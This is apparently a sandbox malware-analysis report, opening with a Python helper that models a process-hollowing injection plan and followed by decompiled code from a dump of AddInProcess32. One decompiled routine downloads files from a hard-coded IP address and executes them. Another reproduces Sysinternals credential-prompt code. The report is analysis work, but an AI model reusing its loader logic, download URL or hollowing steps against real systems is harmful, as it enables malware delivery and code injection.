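    struct.pack_into('<H', img, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into('<I', img, 0x3C, nt)
    struct.pack_into('<IHHIIIHH', img, nt, IMAGE_NT_SIGNATURE, 0x14C, 2, 0, 0, 0, 0xE0, 0x102)
    opt = nt + 0x18
    struct.pack_into('<H', img, opt, 0x10B)              # PE32 magic
    struct.pack_into('<I', img, opt + 0x10, 0x1040)      # AddressOfEntryPoint
    struct.pack_into('<I', img, opt + 0x1C, 0x400000)    # ImageBase
    struct.pack_into('<I', img, opt + 0x38, 0x3000)      # SizeOfImage
    struct.pack_into('<I', img, opt + 0x3C, 0x400)       # SizeOfHeaders
    sec = opt + 0xE0
    for name, va, raw in ((b'.text', 0x1000, 0x200), (b'.data', 0x2000, 0x200)):
        struct.pack_into('<8sIIII', img, sec, name, raw, va, raw, va)
        sec += SECTION_HEADER_SIZE
    return bytes(img)


# Constructed VirtualQueryEx view of the suspended child: a committed block, a free hole
# too small for the 0x190000 floor, then one that fits, then reserved space to the top.
SAMPLE_REGIONS = [
    (0x10000, 0x20000, 0x1000, 0x4),                 # MEM_COMMIT, PAGE_READWRITE
    (0x30000, 0x100000, MEM_FREE, PAGE_NOACCESS),    # 1 MiB hole: rejected
    (0x130000, 0x300000, MEM_FREE, PAGE_NOACCESS),   # 3 MiB hole: selected
    (0x430000, 0x80000000 - 0x430000, 0x2000, 0x1),  # MEM_RESERVE up to 0x80000000
]
SAMPLE_PEB = 0x7FFDF000   # constructed PEB address, as the PROCESS_BASIC_INFORMATION query would return

if __name__ == '__main__':
    plan = plan_hollow(build_sample_image(), SAMPLE_REGIONS, SAMPLE_PEB)
    for addr, src, size in plan['writes']:
        print(f'WriteProcessMemory -> {addr:#010x} from image+{src:#x}, {size:#x} bytes')
    print(f'PEB+8 @ {plan["peb_write"][0]:#x} <- {plan["peb_write"][1]:#x}; Eax = {plan["eax"]:#x}')
```

Run against a real dump, the same walk tells you which remote addresses to expect in the WriteProcessMemory trace and where the PEB patch and the Eax redirect land, which is the evidence to look for in the child process (AddInProcess32 here, per the memory dump source above) rather than in file.exe itself.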


                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 02B523AA
                                              • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02B523B1
                                              • StrCatW.SHLWAPI(00000000,?), ref: 02B523DE
                                              • StrCatW.SHLWAPI(00000000,02B542B4), ref: 02B523F4
                                              • StrCatW.SHLWAPI(00000000,?), ref: 02B523FD
                                              • CreateProcessW.KERNEL32 ref: 02B52418
                                              • TerminateProcess.KERNEL32(00000000,00000000,?,00000000), ref: 02B526EF
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 02B526FC
                                              • HeapFree.KERNEL32(00000000,?,00000000), ref: 02B52703
                                              • GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 02B52710
                                              • HeapFree.KERNEL32(00000000,?,00000000), ref: 02B52717
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Free$AllocCreateTerminate
                                              • String ID: D
                                              • API String ID: 2370014981-2746444292
                                              • Opcode ID: 1d727646815faa7304c5c51b3945d65e93b6293f1a0d03e1be8ccf5e90f0e075
                                              • Instruction ID: a5d6c02516b5a858c17a3d1de5ad9c7b019a9c650b670e759d35a90f04aa699e
                                              • Opcode Fuzzy Hash: 1d727646815faa7304c5c51b3945d65e93b6293f1a0d03e1be8ccf5e90f0e075
                                              • Instruction Fuzzy Hash: 57C15A71A412399BDB259F14DC48BAEB7B9EF08740F1444E9EE09AB240DB709ED4CF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 91%
                                              			E02B51000(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                              				signed int _v8;
                                              				char _v60;
                                              				short _v580;
                                              				long _v584;
                                              				WCHAR* _v588;
                                              				intOrPtr _v592;
                                              				intOrPtr _v596;
                                              				char _v600;
                                              				intOrPtr* _v604;
                                              				struct _PROCESS_INFORMATION _v620;
                                              				struct _STARTUPINFOW _v692;
                                              				signed int _t68;
                                              				void* _t74;
                                              				WCHAR* _t76;
                                              				short _t80;
                                              				WCHAR* _t81;
                                              				WCHAR* _t84;
                                              				intOrPtr _t85;
                                              				WCHAR* _t86;
                                              				WCHAR* _t97;
                                              				short _t98;
                                              				WCHAR* _t103;
                                              				void* _t104;
                                              				void* _t115;
                                              				void* _t117;
                                              				void* _t125;
                                              				void* _t129;
                                              				intOrPtr* _t133;
                                              				signed int _t135;
                                              				WCHAR* _t136;
                                              				void* _t139;
                                              				intOrPtr _t143;
                                              				WCHAR* _t144;
                                              				intOrPtr* _t145;
                                              				void* _t149;
                                              				short* _t153;
                                              				void* _t166;
                                              				void* _t171;
                                              				void* _t172;
                                              				intOrPtr _t183;
                                              				WCHAR* _t185;
                                              				signed int _t189;
                                              				void* _t190;
                                              				long _t192;
                                              				signed int _t193;
                                              				void* _t194;
                                              				intOrPtr* _t195;
                                              
                                              				_t68 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t68 ^ _t193;
                                              				_t192 = 0;
                                              				_v600 = 0;
                                              				_t129 = HeapAlloc(GetProcessHeap(), 8, 0x200000);
                                              				_v596 = _t129;
                                              				E02B52CE7(_t71, _t129, 0x200000);
                                              				_pop(_t139);
                                              				_t74 = E02B5213B(_t129, L"http://109.206.241.33/files/1un.config.CfgEncFile", 0x200000, 0, _t139, _t129,  &_v600);
                                              				_t195 = _t194 + 0xc;
                                              				if(_t74 == 0) {
                                              					L19:
                                              					return E02B53C33(_v8 ^ _t193);
                                              				}
                                              				_t183 = 0x168;
                                              				_v592 = 0x168;
                                              				do {
                                              					_t143 =  *((intOrPtr*)(_t183 + _t129));
                                              					_t7 = _t129 + 1; // 0x1
                                              					_t171 = _t7 + _t183;
                                              					_t185 = _t183 + 0x19 + _t129;
                                              					_v588 = _t185;
                                              					_t76 = _t185;
                                              					if( *_t185 == _t192) {
                                              						L4:
                                              						_v584 = _t192;
                                              						_t133 = _v596 + 0x1b + _v592 + (_t76 - _t185 >> 1) * 2;
                                              						_t80 = 0;
                                              						_v604 = _t133;
                                              						_v580 = 0;
                                              						if(_t143 == 0) {
                                              							_t144 = 0x6d;
                                              							do {
                                              								 *((char*)(_t193 + _t80 - 0x38)) = _t144;
                                              								_t80 = _t80 + 1;
                                              								_t40 = _t80 + "midfile"; // 0x69666469
                                              								_t144 =  *_t40;
                                              								__eflags = _t144;
                                              							} while (_t144 != 0);
                                              							_t145 =  &_v60;
                                              							_t172 = _t145 + 1;
                                              							do {
                                              								_t81 =  *_t145;
                                              								_t145 = _t145 + 1;
                                              								__eflags = _t81;
                                              							} while (_t81 != 0);
                                              							E02B52AC6(_t133,  &_v580,  &_v60, _t185, _t192, _t145 - _t172);
                                              							_t84 = PathFileExistsW( &_v580);
                                              							__eflags = _t84;
                                              							if(_t84 == 0) {
                                              								L12:
                                              								_t149 = _t133 + 2;
                                              								do {
                                              									_t85 =  *_t133;
                                              									_t133 = _t133 + 2;
                                              								} while (_t85 != _t192);
                                              								_t86 = _t185;
                                              								_t135 = _t133 - _t149 >> 1;
                                              								if( *_t185 == _t192) {
                                              									goto L16;
                                              								} else {
                                              									goto L15;
                                              								}
                                              								do {
                                              									L15:
                                              									_t86 =  &(_t86[1]);
                                              								} while ( *_t86 != _t192);
                                              								goto L16;
                                              							}
                                              							DeleteFileW( &_v580);
                                              							__imp__URLDownloadToFileW(_t192, _t133,  &_v580, _t192, _t192);
                                              							__eflags = PathFileExistsW( &_v580);
                                              							if(__eflags == 0) {
                                              								goto L12;
                                              							}
                                              							_t97 = E02B53B3F(_t133,  &_v580, _v596 + _v592 + 1, _t185, _t192, __eflags);
                                              							__eflags = _t97;
                                              							if(_t97 == 0) {
                                              								goto L12;
                                              							}
                                              							_t52 =  &(_t185[1]); // 0x151
                                              							_t153 = _t52;
                                              							do {
                                              								_t98 =  *_t185;
                                              								_t185 =  &(_t185[1]);
                                              								__eflags = _t98 - _t192;
                                              							} while (_t98 != _t192);
                                              							_t189 = _t185 - _t153 >> 1;
                                              							_t136 = HeapAlloc(GetProcessHeap(), _t192, 0x21c + _t189 * 2);
                                              							__eflags = _t136;
                                              							if(_t136 != 0) {
                                              								E02B52CE7(0x21c + _t189 * 2, _t136, 0x21c + _t189 * 2);
                                              							}
                                              							_t103 = StrCatW(_t136,  &_v580);
                                              							__eflags = _t189;
                                              							if(_t189 == 0) {
                                              								_t185 = _v588;
                                              							} else {
                                              								StrCatW(_t136, " ");
                                              								_t185 = _v588;
                                              								_t103 = StrCatW(_t136, _t185);
                                              							}
                                              							_t104 = E02B52CE7(_t103,  &_v692, 0x44);
                                              							_v692.cb = 0x44;
                                              							E02B52CE7(_t104,  &_v620, 0x10);
                                              							CreateProcessW(_t192, _t136, _t192, _t192, _t192, _t192, _t192, _t192,  &_v692,  &_v620);
                                              							CloseHandle(_v620);
                                              							CloseHandle(_v620.hThread);
                                              							Sleep(0x64);
                                              							_t133 = _v604;
                                              							goto L12;
                                              						}
                                              						_t115 = E02B51D9D(_t133, _t133, _t171, _t185, _t192, _t143, _t143, _t192,  &_v584);
                                              						_t195 = _t195 + 0x10;
                                              						if(_t115 != 3) {
                                              							L8:
                                              							_t190 = _t192;
                                              							L9:
                                              							E02B52AC6(_t133,  &_v580, _t190, _t190, _t192, _v584);
                                              							 *_t195 = 0x1c00;
                                              							_t117 = E02B52AC6(_t133,  &_v580, 0x2b57468, _t190, _t192);
                                              							_pop(_t163);
                                              							_t203 = _t117;
                                              							if(_t117 != 0) {
                                              								E02B522F0(_t133,  &_v580, _t190, _t190, _t192, _t203, _v584, _v588);
                                              								_t195 = _t195 + 0xc;
                                              								HeapFree(GetProcessHeap(), _t192, _t190);
                                              							}
                                              							_t185 = _v588;
                                              							goto L12;
                                              						}
                                              						_t190 = HeapAlloc(GetProcessHeap(), 8, _v584);
                                              						E02B52CE7(_t122, _t190, _v584);
                                              						_pop(_t166);
                                              						_t125 = E02B51D9D(_t133, _t133, _v596 + _v592 + 1, _t190, _t192, _t166, _t166, _t190,  &_v584);
                                              						_t195 = _t195 + 0x10;
                                              						if(_t125 == 1) {
                                              							goto L9;
                                              						}
                                              						HeapFree(GetProcessHeap(), _t192, _t190);
                                              						goto L8;
                                              					} else {
                                              						goto L3;
                                              					}
                                              					do {
                                              						L3:
                                              						_t76 =  &(_t76[1]);
                                              					} while ( *_t76 != _t192);
                                              					goto L4;
                                              					L16:
                                              					_t129 = _v596;
                                              					_t183 = _v592 + ((_t86 - _t185 >> 1) + _t135) * 2 + 0x1d;
                                              					_v592 = _t183;
                                              				} while (_t183 + 4 != _v600);
                                              				while(E02B53A3D(_t192) == 0) {
                                              					Sleep(0x3e8);
                                              					_t192 = _t192 + 1;
                                              					if(_t192 < 0x258) {
                                              						continue;
                                              					}
                                              					goto L19;
                                              				}
                                              				goto L19;
                                              			}
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x02b51087
                                              0x02b51087
                                              0x02b51087
                                              0x02b5108a
                                              0x00000000
                                              0x02b511bd
                                              0x02b511c9
                                              0x02b511d2
                                              0x02b511d5
                                              0x02b511de
                                              0x02b511ea
                                              0x02b511f8
                                              0x02b511fe
                                              0x02b51205
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x02b51205
                                              0x00000000

                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00200000,?,00000000), ref: 02B51026
                                              • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02B5102D
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,00000000), ref: 02B510E5
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02B510EC
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02B5112C
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02B51133
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 02B51189
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 02B51190
                                              • Sleep.KERNEL32(000003E8,?,00000000), ref: 02B511F8
                                              • PathFileExistsW.SHLWAPI(?,?,00000000), ref: 02B5124F
                                              • DeleteFileW.KERNEL32(?,?,00000000), ref: 02B51264
                                              • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 02B51275
                                              • PathFileExistsW.SHLWAPI(?,?,00000000), ref: 02B51282
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 02B512CD
                                              • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02B512D4
                                              • StrCatW.SHLWAPI(00000000,?), ref: 02B512F8
                                              • StrCatW.SHLWAPI(00000000,02B542B4), ref: 02B51308
                                              • StrCatW.SHLWAPI(00000000,?), ref: 02B51316
                                              • CreateProcessW.KERNEL32 ref: 02B51360
                                              • CloseHandle.KERNEL32(?,?,00000000), ref: 02B51372
                                              • CloseHandle.KERNEL32(?,?,00000000), ref: 02B5137A
                                              • Sleep.KERNEL32(00000064,?,00000000), ref: 02B5137E
                                              Strings
                                              • http://109.206.241.33/files/1un.config.CfgEncFile, xrefs: 02B5104D
                                              • D, xrefs: 02B5133A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$File$Alloc$CloseExistsFreeHandlePathSleep$CreateDeleteDownload
                                              • String ID: D$http://109.206.241.33/files/1un.config.CfgEncFile
                                              • API String ID: 1600074791-2963522458
                                              • Opcode ID: b2edb745f29f40c0b21c61d5d9b76109c268648b5f3b8f32dbd313589820a59d
                                              • Instruction ID: 5672dd783a8149d5316c3ad44bc871f535f52308d2665a6a758fd98d8c43f8bf
                                              • Opcode Fuzzy Hash: b2edb745f29f40c0b21c61d5d9b76109c268648b5f3b8f32dbd313589820a59d
                                              • Instruction Fuzzy Hash: 37A171729102299BDB25AF68DC88BEEB77AFF44340F1805D9E90D9B250DB309AD5CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 47%
                                              			E00402CB0(void* __ecx, WCHAR* __edi, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20, char _a24, char _a28, intOrPtr _a32, char _a36, char _a40, intOrPtr _a44, char _a48, char _a56, WCHAR* _a60, char* _a64, WCHAR* _a68, WCHAR* _a72, char _a76, char _a78, char _a1104, char _a1106, signed int _a66600, signed int _a66640, intOrPtr _a66648, intOrPtr _a66652, intOrPtr _a66656, intOrPtr _a66660) {
                                              				char _v0;
                                              				char _v20;
                                              				char _v24;
                                              				char _v28;
                                              				long _v32;
                                              				intOrPtr _v36;
                                              				char* _v40;
                                              				void* __ebx;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t69;
                                              				_Unknown_base(*)()* _t79;
                                              				_Unknown_base(*)()* _t81;
                                              				char* _t83;
                                              				long _t84;
                                              				void* _t86;
                                              				long _t87;
                                              				_Unknown_base(*)()* _t93;
                                              				void* _t97;
                                              				intOrPtr _t107;
                                              				WCHAR* _t129;
                                              				void* _t131;
                                              				long _t132;
                                              				void* _t133;
                                              				intOrPtr _t135;
                                              				signed int _t137;
                                              				signed int _t138;
                                              
                                              				_t129 = __edi;
                                              				E0040B320(0x10454);
                                              				_t69 =  *0x413004; // 0x98fc836b
                                              				_a66640 = _t69 ^ _t137;
                                              				_t135 = _a66656;
                                              				_t131 = __ecx;
                                              				_a20 = _a66652;
                                              				_a12 = 0x100;
                                              				_a8 = 0x151;
                                              				_a1104 = 0;
                                              				E00409280(__edi,  &_a1106, 0, 0xfffe);
                                              				_a76 = 0;
                                              				E00409280(_t129,  &_a78, 0, 0x402);
                                              				_a32 = 0;
                                              				_a36 = 0;
                                              				_a40 = 0;
                                              				_a44 = 0;
                                              				_a28 = 0;
                                              				_a24 = 0;
                                              				_v0 = 0;
                                              				_a4 = 0;
                                              				_a48 = 0;
                                              				_a16 = 0x201;
                                              				E0040366B(E004036E5( &_a1104,  &_a1104, 0x8000, L"Please enter credentials to use for "),  &_a1104, 0x8000, _t131);
                                              				_t138 = _t137 + 0x30;
                                              				_a28 = 0x14;
                                              				_a40 = L"Sysinternals Run as Different User (Netonly)";
                                              				if(_a66648 == 0) {
                                              					_a40 = L"Sysinternals Run as Different User";
                                              				}
                                              				_a36 =  &_a1104;
                                              				_t79 = GetProcAddress(LoadLibraryW(L"Credui.dll"), "CredUIPromptForWindowsCredentialsW");
                                              				if(_t79 == 0) {
                                              					 *_t129 = 0;
                                              					_t81 = GetProcAddress(LoadLibraryW(L"Credui.dll"), "CredUIPromptForCredentialsW");
                                              					_a56 = 0;
                                              					_a64 = 0;
                                              					_a68 = 0;
                                              					_a60 = 0;
                                              					_a72 = 0;
                                              					_a64 =  &_a1104;
                                              					_a56 = 0x14;
                                              					_a68 = L"ShellRunas - Sysinternals: www.sysinternals.com";
                                              					_t132 =  *_t81( &_a56, _t131, 0, 0,  &_a76, _a16, _t135, _a12,  &_a48, 0x40082);
                                              					if(_t132 != 0) {
                                              						goto L12;
                                              					}
                                              					_t86 = E00403939( &_a36, 0x5c);
                                              					_t138 = _t138 + 8;
                                              					if(_t86 == 0) {
                                              						E004036E5(_t86, _v20, 0x201,  &_a36);
                                              						_t138 = _t138 + 0xc;
                                              						GetComputerNameW(_t129,  &_v32);
                                              					}
                                              					goto L9;
                                              				} else {
                                              					_t132 =  *_t79( &_a28, _a66660,  &_a24, 0, 0,  &_v0,  &_a4, 0, 0);
                                              					if(_t132 != 0) {
                                              						L12:
                                              						_t83 = _v40;
                                              						if(_t83 == 0) {
                                              							L17:
                                              							_t84 = _t132;
                                              							_pop(_t133);
                                              							_pop(_t97);
                                              							E0040318A(_t84, _t97, _a66600 ^ _t138, _t133);
                                              							return _t84;
                                              						}
                                              						_t107 = _v36;
                                              						if(_t107 == 0) {
                                              							L16:
                                              							__imp__CoTaskMemFree(_t83);
                                              							goto L17;
                                              						} else {
                                              							goto L14;
                                              						}
                                              						do {
                                              							L14:
                                              							 *_t83 = 0;
                                              							_t83 = _t83 + 1;
                                              							_t107 = _t107 - 1;
                                              						} while (_t107 != 0);
                                              						_t83 = _v40;
                                              						goto L16;
                                              					}
                                              					_a16 = _v28;
                                              					_t93 = GetProcAddress(LoadLibraryW(L"Credui.dll"), "CredUnPackAuthenticationBufferW");
                                              					_push( &_v24);
                                              					_push(_t135);
                                              					_push( &_a16);
                                              					_push(_t129);
                                              					_push( &_v20);
                                              					_push( &_a40);
                                              					_push(_v32);
                                              					_push(_v36);
                                              					_push(1);
                                              					if( *_t93() != 0) {
                                              						L9:
                                              						if( *_t129 != 0) {
                                              							goto L12;
                                              						}
                                              						_t87 =  &_a36;
                                              						__imp__CredUIParseUserNameW(_t87, _v20, 0x201, _t129, _v32);
                                              						L11:
                                              						_t132 = _t87;
                                              						goto L12;
                                              					}
                                              					_t87 = GetLastError();
                                              					goto L11;
                                              				}
                                              			}
                                              Instruction address column for E00402CB0 (per-line addresses, 0x00402cb0 to 0x00402f54; the column was separated from the decompiled lines above)

                                              APIs
                                              • _memset.LIBCMT ref: 00402D07
                                              • _memset.LIBCMT ref: 00402D1C
                                              • _wcscpy_s.LIBCMT ref: 00402D61
                                              • _wcscat_s.LIBCMT ref: 00402D74
                                              • LoadLibraryW.KERNEL32(Credui.dll,CredUIPromptForWindowsCredentialsW), ref: 00402DB2
                                              • GetProcAddress.KERNEL32(00000000), ref: 00402DB9
                                              • LoadLibraryW.KERNEL32(Credui.dll,CredUnPackAuthenticationBufferW), ref: 00402E05
                                              • GetProcAddress.KERNEL32(00000000), ref: 00402E0C
                                              • GetLastError.KERNEL32 ref: 00402E3E
                                              • LoadLibraryW.KERNEL32(Credui.dll,CredUIPromptForCredentialsW), ref: 00402E56
                                              • GetProcAddress.KERNEL32(00000000), ref: 00402E5D
                                              • _wcschr.LIBCMT ref: 00402EC5
                                              • _wcscpy_s.LIBCMT ref: 00402EE0
                                              • GetComputerNameW.KERNEL32 ref: 00402EEE
                                              • CredUIParseUserNameW.CREDUI(?,?,00000201,?,?), ref: 00402F0E
                                              • CoTaskMemFree.OLE32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,?,?), ref: 00402F35
                                              Strings
                                              • CredUIPromptForCredentialsW, xrefs: 00402E49
                                              • CredUnPackAuthenticationBufferW, xrefs: 00402DF7
                                              • ShellRunas - Sysinternals: www.sysinternals.com, xrefs: 00402EAE
                                              • Please enter credentials to use for , xrefs: 00402D23
                                              • Sysinternals Run as Different User (Netonly), xrefs: 00402D8B
                                              • Sysinternals Run as Different User, xrefs: 00402D95
                                              • Credui.dll, xrefs: 00402DA9, 00402DFC, 00402E4E
                                              • CredUIPromptForWindowsCredentialsW, xrefs: 00402D9D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc$Name_memset_wcscpy_s$ComputerCredErrorFreeLastParseTaskUser_wcscat_s_wcschr
                                              • String ID: CredUIPromptForCredentialsW$CredUIPromptForWindowsCredentialsW$CredUnPackAuthenticationBufferW$Credui.dll$Please enter credentials to use for $ShellRunas - Sysinternals: www.sysinternals.com$Sysinternals Run as Different User$Sysinternals Run as Different User (Netonly)
                                              • API String ID: 3725605542-3868041870
                                              • Opcode ID: cb23a2282606d663bf4c3b277bbcac3a273acd568eebcb31d91e76a76b45ee14
                                              • Instruction ID: a6c5cf5511b36f9deb478c5fb5984fdae67559a08a685e8c4f8a8008dfdfd372
                                              • Opcode Fuzzy Hash: cb23a2282606d663bf4c3b277bbcac3a273acd568eebcb31d91e76a76b45ee14
                                              • Instruction Fuzzy Hash: A97151B1508341AFD714DF94CD859ABBBF8BFC8744F00492EF285A3290E7B59948CB5A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 38%
                                              			E004029C0(WCHAR* __ecx, void* __eflags, WCHAR* _a4) {
                                              				signed int _v4;
                                              				signed int _v8;
                                              				char _v86;
                                              				short _v88;
                                              				char _v166;
                                              				short _v168;
                                              				char _v204;
                                              				char _v220;
                                              				char _v284;
                                              				char _v300;
                                              				WCHAR* _v768;
                                              				WCHAR* _v772;
                                              				WCHAR* _v780;
                                              				char _v784;
                                              				intOrPtr* _v788;
                                              				char _v792;
                                              				intOrPtr* _v796;
                                              				WCHAR* _v800;
                                              				char _v804;
                                              				void* _v808;
                                              				signed int _v812;
                                              				char _v844;
                                              				char _v852;
                                              				intOrPtr _v856;
                                              				char _v864;
                                              				char _v872;
                                              				char _v876;
                                              				signed int _v884;
                                              				intOrPtr* _v892;
                                              				intOrPtr* _v896;
                                              				intOrPtr* _v908;
                                              				char _v924;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t68;
                                              				signed int _t72;
                                              				intOrPtr* _t73;
                                              				intOrPtr* _t74;
                                              				intOrPtr* _t75;
                                              				intOrPtr* _t76;
                                              				signed int _t78;
                                              				intOrPtr* _t81;
                                              				signed int _t86;
                                              				intOrPtr* _t88;
                                              				signed int _t90;
                                              				intOrPtr* _t91;
                                              				intOrPtr* _t93;
                                              				intOrPtr* _t96;
                                              				intOrPtr* _t98;
                                              				signed int _t100;
                                              				intOrPtr* _t101;
                                              				signed int _t103;
                                              				intOrPtr* _t104;
                                              				intOrPtr* _t107;
                                              				char* _t109;
                                              				signed int _t111;
                                              				void* _t114;
                                              				WCHAR* _t115;
                                              				void* _t116;
                                              				signed int _t117;
                                              				WCHAR* _t120;
                                              				void* _t159;
                                              				void* _t162;
                                              				signed int _t163;
                                              				void* _t164;
                                              				void* _t165;
                                              				WCHAR* _t166;
                                              				signed int _t168;
                                              				signed int _t169;
                                              
                                              				_t168 =  &_v808;
                                              				_t68 =  *0x413004; // 0x98fc836b
                                              				_v4 = _t68 ^ _t168;
                                              				_t166 = _a4;
                                              				_t115 = __ecx;
                                              				_v768 = __ecx;
                                              				_v792 = 0x104;
                                              				_v788 = 0;
                                              				_v804 = 0;
                                              				_v784 = 0;
                                              				_v780 = 0;
                                              				_v800 = 0;
                                              				_v796 = 0;
                                              				_v772 = 0;
                                              				_v168 = 0;
                                              				E00409280(0,  &_v166, 0, 0x4c);
                                              				_v88 = 0;
                                              				_t72 = E00409280(0,  &_v86, 0, 0x4c);
                                              				_t169 = _t168 + 0x18;
                                              				__imp__SHGetMalloc( &_v800, _t159, _t162, _t165, _t114);
                                              				_t163 = _t72;
                                              				if(_t163 < 0) {
                                              					L28:
                                              					_t73 = _v788;
                                              					if(_t73 != 0) {
                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t73 + 8))))(_t73);
                                              					}
                                              					_t74 = _v808;
                                              					if(_t74 != 0) {
                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t74 + 8))))(_t74);
                                              					}
                                              					_t120 = _v800;
                                              					if(_t120 != 0) {
                                              						_t81 = _v804;
                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t81 + 0x14))))(_t81, _t120);
                                              					}
                                              					_t75 = _v792;
                                              					if(_t75 != 0) {
                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t75 + 8))))(_t75);
                                              					}
                                              					_t76 = _v804;
                                              					if(_t76 != 0) {
                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76);
                                              					}
                                              					_pop(_t164);
                                              					_pop(_t116);
                                              					_t78 = _t163 & 0x0000ffff;
                                              					E0040318A(_t78, _t116, _v8 ^ _t169, _t164);
                                              					return _t78;
                                              				}
                                              				_t86 =  &_v792;
                                              				__imp__SHGetDesktopFolder(_t86);
                                              				_t163 = _t86;
                                              				if(_t163 < 0) {
                                              					goto L28;
                                              				}
                                              				if(SearchPathW(0, _t115, L".exe", _v800, _t166,  &_v772) != 0) {
                                              					_t88 = _v796;
                                              					_v784 = 0x1010000;
                                              					_t90 =  *((intOrPtr*)( *((intOrPtr*)( *_t88 + 0xc))))(_t88, 0, 0, _t166, 0,  &_v804,  &_v784);
                                              					_t163 = _t90;
                                              					__eflags = _t163;
                                              					if(_t163 < 0) {
                                              						goto L28;
                                              					}
                                              					__eflags = _v812 & 0x00010000;
                                              					if((_v812 & 0x00010000) != 0) {
                                              						__imp__CoInitialize(0);
                                              						_t163 = _t90;
                                              						__eflags = _t163;
                                              						if(_t163 < 0) {
                                              							goto L28;
                                              						}
                                              						__imp__CoCreateInstance(0x40d2fc, 0, 1,  &E0040D2CC,  &_v844);
                                              						_t163 = _t90;
                                              						__eflags = _t163;
                                              						if(_t163 < 0) {
                                              							L27:
                                              							__imp__CoUninitialize();
                                              							goto L28;
                                              						}
                                              						_t91 = _v864;
                                              						_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x14))))(_t91, _v856);
                                              						__eflags = _t163;
                                              						if(_t163 < 0) {
                                              							goto L27;
                                              						}
                                              						_t93 = _v872;
                                              						_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t93))))(_t93, 0x40d2dc,  &_v852);
                                              						__eflags = _t163;
                                              						if(_t163 < 0) {
                                              							goto L27;
                                              						}
                                              						_t96 = _v864;
                                              						_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t96 + 0x14))))(_t96, _t115, 0);
                                              						__eflags = _t163;
                                              						if(_t163 < 0) {
                                              							goto L27;
                                              						}
                                              						_t98 = _v896;
                                              						_t100 =  *((intOrPtr*)( *((intOrPtr*)( *_t98))))(_t98, 0x40d2ec,  &_v872);
                                              						__eflags = _t100;
                                              						if(_t100 < 0) {
                                              							L25:
                                              							_t101 = _v908;
                                              							_t103 =  *((intOrPtr*)( *((intOrPtr*)( *_t101 + 0xc))))(_t101, _t166, _v896,  &_v864, 0);
                                              							L26:
                                              							_t163 = _t103;
                                              							goto L27;
                                              						}
                                              						_t104 = _v884;
                                              						_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0x18))))(_t104,  &_v876);
                                              						__eflags = _t163;
                                              						if(_t163 < 0) {
                                              							L18:
                                              							_t117 = 0;
                                              							__eflags = 0;
                                              							L19:
                                              							_t107 = _v892;
                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 8))))(_t107);
                                              							__eflags = _t117;
                                              							if(_t117 == 0) {
                                              								goto L25;
                                              							}
                                              							_t103 =  &_v204;
                                              							_push(_t103);
                                              							_push(0);
                                              							_push( &_v284);
                                              							_push(_v884);
                                              							L00403172();
                                              							__eflags = _t103;
                                              							if(__eflags == 0) {
